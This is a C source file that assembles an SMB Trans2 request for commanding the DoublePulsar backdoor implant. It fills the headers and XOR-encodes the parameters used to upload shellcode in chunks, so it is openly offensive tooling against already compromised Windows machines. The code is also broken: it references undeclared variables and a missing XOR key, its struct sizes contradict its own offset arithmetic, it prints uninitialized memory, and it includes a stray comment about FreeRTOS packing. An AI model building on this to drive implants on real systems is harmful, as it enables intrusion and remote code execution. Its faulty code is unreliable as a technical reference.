/*
The purpose is to generate a Doublepulsar execute SMB packet and fill in all the applicable values
so a proper request can be sent and executed on the Doublepulsar implant
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
typedef unsigned short ushort; // 16-bit field type used by the packed SMB structs below
typedef unsigned char uchar; // NOTE(review): not referenced anywhere in this file; the structs spell out `unsigned char`
/*
However, the TCP/IP protocol headers do not have padding bytes, so the compiler must be instructed not to add additional padding bytes to structures
that map onto the IP protocol headers that are written to or read from Ethernet frames.
Structures that do not contain padding bytes are said to be 'packed'.
The syntax required to ensure structures are packed depends on the embedded C compiler.
The FreeRTOS+TCP implementation cannot use any C compiler specific syntax in the common (not MCU port specific) files,
and instead allows users to define their own packing directives in two very simple header files that are then included from the C files.
*/
/* Sources used:
https://www.rapid7.com/blog/post/2019/10/02/open-source-command-and-control-of-the-doublepulsar-implant/
https://shasaurabh.blogspot.com/2017/05/doublepulsar-backdoor.html
https://www.geeksforgeeks.org/structure-member-alignment-padding-and-data-packing/
*/
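// Byte-pack every struct from here to the matching pop so the overlays in
// generate_SMB_packet() occupy exactly their on-the-wire sizes.  push (rather than a
// bare pack(1)) records the previous packing so it can be restored afterwards.
#pragma pack(push, 1)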
//struct __attribute__((__packed__)) net_bios
/* NetBIOS session header as this file lays it out: 6 bytes under #pragma pack(1) (2 + 4).
 * NOTE(review): generate_SMB_packet() stores a 16-bit htons() result in the 32-bit
 * `length` field and its own comment treats the NetBIOS header as 4 bytes, so this
 * struct's size and the code that fills it disagree — confirm the intended layout. */
typedef struct
{
uint16_t type; // added by the author ("remove if there is a problem"); set to 0 by generate_SMB_packet()
uint32_t length; // receives htons(4174) in generate_SMB_packet()
} net_bios;
//struct __attribute__((__packed__)) smb_header
/* SMB1 message header, 32 bytes under #pragma pack(1).  The field names follow the
 * author's reading of the Microsoft SMB documentation; every field is assigned in
 * generate_SMB_packet(), which is the only user in this file. */
typedef struct
{
unsigned char protocol[4]; // "\xffSMB" magic
unsigned char command; // 0x32 (Trans2) in generate_SMB_packet()
uint32_t NTSTATUS; // status; written as 0 for the request
unsigned char flag;
ushort flag2;
ushort PIDHigh; // upper half of the process id; `pid` below holds the low half
unsigned char SecuritySignature[8]; // zeroed in generate_SMB_packet()
/*
from Microsoft documentation: UCHAR SecurityFeatures[8];
unsigned char securityFeature[8]; OR BYTE SecuritySignature[8];
*/
ushort reserves;
ushort tid; // tree id
ushort pid; // process id (low 16 bits)
ushort uid; // user id
ushort mid; // multiplex id
} smb_header;
//struct __attribute__((__packed__)) Trans_Response
/* Parameter block of a Trans2 message, 34 bytes under #pragma pack(1):
 * wordCount (1) + 15 words (30) + byteCount (2) + one padding byte (1).
 * Despite the name, generate_SMB_packet() fills it in as a *request* (command 0x32).
 * The offsets it carries are measured from the start of smb_header:
 * 32 + 34 = 66 for the parameters, 66 + 12 = 78 for the data, matching the
 * constants and the sizeof() arithmetic in generate_SMB_packet(). */
typedef struct
{
unsigned char wordCount; // 15: number of 16-bit words that follow, up to and including subcommand
ushort totalParameterCount;
ushort totalDataCount;
ushort maxParameterCount;
ushort maxDataCount;
unsigned char maxSetupCount;
unsigned char reserved;
ushort flags;
uint32_t timeout;
ushort reserved2;
ushort parameterCount;
ushort parameterOffset; // byte offset of smb_parameters from the start of smb_header
ushort dataCount;
ushort dataOffset; // byte offset of the data area from the start of smb_header
unsigned char setupCount; // 1: a single setup word (subcommand) follows
unsigned char reserved3;
ushort subcommand; // the Trans2 setup word
ushort byteCount; // bytes after this word count: padding + parameters + data
//ushort padding; //creates 2 bytes, while the packet only needs 1
unsigned char padding; // exactly 1 byte on the wire; do NOT use ushort here
} Trans_Response;
//Size of params: 12
/*
typedef struct
{
ULONG DataSize;
ULONG chunksize;
ULONG offset;
} smb_parameters;
*/
//typedef struct __attribute__((__packed__))
/* Opaque 12-byte Trans2 parameter area.  generate_SMB_packet() memcpy()s three 4-byte
 * values into it (DataSize, chunksize, offset, in that order), i.e. the three-ULONG
 * layout shown in the commented-out struct above. */
typedef struct
{
unsigned char parameters[12];
} smb_parameters;
/* 4096-byte Trans2 data area.
 * NOTE(review): no code in this file creates an smb_data overlay or writes this region;
 * generate_SMB_packet() only accounts for its size in the counts it sets. */
typedef struct
{
unsigned char smbdata[4096];
} smb_data;
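// Restore the packing that was in effect before the packet structs above.
// (The previous `#pragma pop` is not the pack pragma; compilers ignore it as an
// unknown pragma, which left everything after it packed to 1 byte.)
#pragma pack(pop)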
/*
# SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}
# SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}
*/
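/*
 * Print `len` bytes starting at `addr` as a 16-bytes-per-line hex dump: a row offset,
 * the hex bytes, and a printable-ASCII column in which anything outside 0x20..0x7e is
 * shown as '.'.
 *
 * desc  optional label printed on its own line first; may be NULL.
 * addr  start of the bytes to dump; only read, never written.
 * len   number of bytes; a zero or negative count prints just the label.
 *
 * Writes to stdout only and returns nothing.  Fix over the previous version: for
 * len <= 0 the ASCII row buffer was printed without ever being written (uninitialized
 * read), and a NULL addr was dereferenced.
 */
void hexDump(const char* desc, const void* addr, int len)
{
const unsigned char* pc = (const unsigned char*)addr;
unsigned char ascii[17]; // one 16-character row plus its NUL terminator
if (desc != NULL) {
printf("%s:\n", desc);
}
// Nothing to dump: avoid printing an ASCII row that was never filled.
if (len <= 0 || pc == NULL) {
return;
}
int i;
for (i = 0; i < len; i++) {
int col = i % 16;
if (col == 0) {
// Flush the previous row's ASCII column before starting a new row.
if (i != 0) {
printf(" %s\n", ascii);
}
printf(" %04x ", i);
}
printf(" %02x", pc[i]);
// Keep a printable copy of the byte for the ASCII column.
ascii[col] = (pc[i] < 0x20 || pc[i] > 0x7e) ? '.' : pc[i];
ascii[col + 1] = '\0';
}
// Pad a short final row so the ASCII column lines up with the rows above.
while ((i % 16) != 0) {
printf(" ");
i++;
}
printf(" %s\n", ascii);
}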
/*
 * Build one Trans2 SMB request in a local buffer laid out, under #pragma pack(1), as
 * net_bios | smb_header | Trans_Response | smb_parameters | (4096-byte data area),
 * then hex-dump it and wait for a keypress.  Nothing is transmitted by this function:
 * there is no socket call here; its only observable effect is the hexDump() output.
 *
 * NOTE(review): as written this does not compile — `buffer` and `netbios` (in the
 * smb_params line) and `XorKey` (in the three parameter values) are declared nowhere
 * in this file.  `send_buffer` and `net_bios` are the names used elsewhere in the
 * function; XorKey has no definition in view.
 *
 * NOTE(review): send_buffer is never zeroed and the 4096-byte data area after
 * smb_parameters is never written, so the final hexDump() prints uninitialized stack
 * memory for that region.  The fixed numbers below assume a 4-byte NetBIOS header
 * (4174 = 4178 - 4, a 4179-byte buffer), whereas net_bios is 6 bytes under pack(1),
 * which places every later struct two bytes further in — confirm which layout is meant.
 */
void generate_SMB_packet()
{
// Overlay the packed structs on one uninitialized stack buffer.
unsigned char send_buffer[4179];
net_bios *nb = (net_bios*)send_buffer;
smb_header* smb = (smb_header*)(send_buffer + sizeof(net_bios));
Trans_Response *trans2 = (Trans_Response*)(send_buffer + sizeof(net_bios) + sizeof(smb_header));
nb->type = 0x00;
// NOTE(review): htons() yields a 16-bit value that is widened into the 32-bit `length`
// field; the value is the packet size with the 4-byte NetBIOS header excluded.
nb->length = htons(4174); //NetBIOS size = totalPacketSize - 4 ( NetBIOS header is not counted )
//Size of smb_header + size of Trans2_Response header + parameter size + SMB_Data are counted in the packet size
//nb->length = htons(4174);
/*
uint16_t htons_len = htons(4174);
memcpy(buffer+2, &htons_len, 2);
hexDump(0,buffer,10);
*/
// SMB1 header: "\xffSMB" magic, Trans2 command, zero status, flags and ids.
smb->protocol[0] = '\xff';
smb->protocol[1] = 'S';
smb->protocol[2] = 'M';
smb->protocol[3] = 'B';
smb->command = 0x32;
smb->NTSTATUS = 0x00000000;
smb->flag = 0x18;
smb->flag2 = 0xc007;
smb->PIDHigh = 0x0000;
// Signature is left all-zero (no signing on this request).
smb->SecuritySignature[0] = 0;
smb->SecuritySignature[1] = 0;
smb->SecuritySignature[2] = 0;
smb->SecuritySignature[3] = 0;
smb->SecuritySignature[4] = 0;
smb->SecuritySignature[5] = 0;
smb->SecuritySignature[6] = 0;
smb->SecuritySignature[7] = 0;
smb->reserves = 0x0000;
smb->pid = 0xfeff;
smb->tid = 2048;
smb->uid = 2048;
smb->mid = 66;
// Trans2 parameter block: 15 words, 12 parameter bytes, 4096 data bytes.
// Offsets are relative to the start of smb_header (see the two printf()s below).
trans2->wordCount = 15;
trans2->totalParameterCount = 12;
trans2->totalDataCount = 4096;
trans2->maxParameterCount = 1;
trans2->maxDataCount = 0;
trans2->maxSetupCount = 0;
trans2->reserved = 0;
trans2->flags = 0x0000;
trans2->timeout = 0x001a8925;
trans2->reserved2 = 0x0000;
trans2->parameterCount = 12;
trans2->parameterOffset = 66; // hard-coded 32 + 34; overwritten with the sizeof()-derived value below
trans2->dataCount = 4096;
trans2->dataOffset = 78; // hard-coded 66 + 12; overwritten with the sizeof()-derived value below
trans2->setupCount = 1;
trans2->reserved3 = 0x00;
trans2->subcommand = 0x000e;
trans2->byteCount = 4109; // 1 (padding) + 12 (parameters) + 4096 (data); still a fixed number
trans2->padding = 0x00;
// NOTE(review): sizeof() yields size_t, so `%d` is a format/argument mismatch; `%zu` matches.
printf("Offset of Parameters: %d\n", sizeof(smb_header) + sizeof(Trans_Response));
printf("Offset of Data: %d\n", sizeof(smb_header) + sizeof(Trans_Response) + sizeof(smb_parameters));
// Recompute the two offsets from the struct sizes (66 and 78 under pack(1)) and
// replace the hard-coded assignments above, which are therefore dead.
int param_offset_len = sizeof(smb_header) + sizeof(Trans_Response);
int dataOffset_len = sizeof(smb_header) + sizeof(Trans_Response) + sizeof(smb_parameters);
trans2->parameterOffset = param_offset_len;
trans2->dataOffset = dataOffset_len;
// NOTE(review): `buffer` and `netbios` are undeclared here; `send_buffer` / `net_bios`
// are the names used above.
smb_parameters *smb_params = (smb_parameters*)(buffer + sizeof(netbios) + sizeof(smb_header) + sizeof(Trans_Response));
//make DataSize dynamic where it calculates the size of the buffer of the payload / shellcode
//In this case, this is static but will change to be dynamic in the future.
// NOTE(review): XorKey is not declared anywhere in this file.
unsigned long DataSize = 0x507308 ^ XorKey;
//size of the chunk of the payload being sent. all but last packet are 4096
unsigned long chunksize = 4096 ^ XorKey;
//offset begins at 0 and increments based on the previous packets sent
unsigned long offset = 0 ^ XorKey;
// Copy the first 4 bytes of each value into the 12-byte parameter area
// (unsigned long is 4 bytes on MSVC; wider on other ABIs — only 4 are copied either way).
memcpy(smb_params->parameters, (unsigned char*)&DataSize, 4);
memcpy(smb_params->parameters + 4, (unsigned char*)&chunksize, 4);
memcpy(smb_params->parameters +8 , (unsigned char*)&offset, 4);
// Dump the whole assembled packet (4178 bytes, one short of the buffer) and pause.
hexDump(0, send_buffer, 4178);
getchar();
}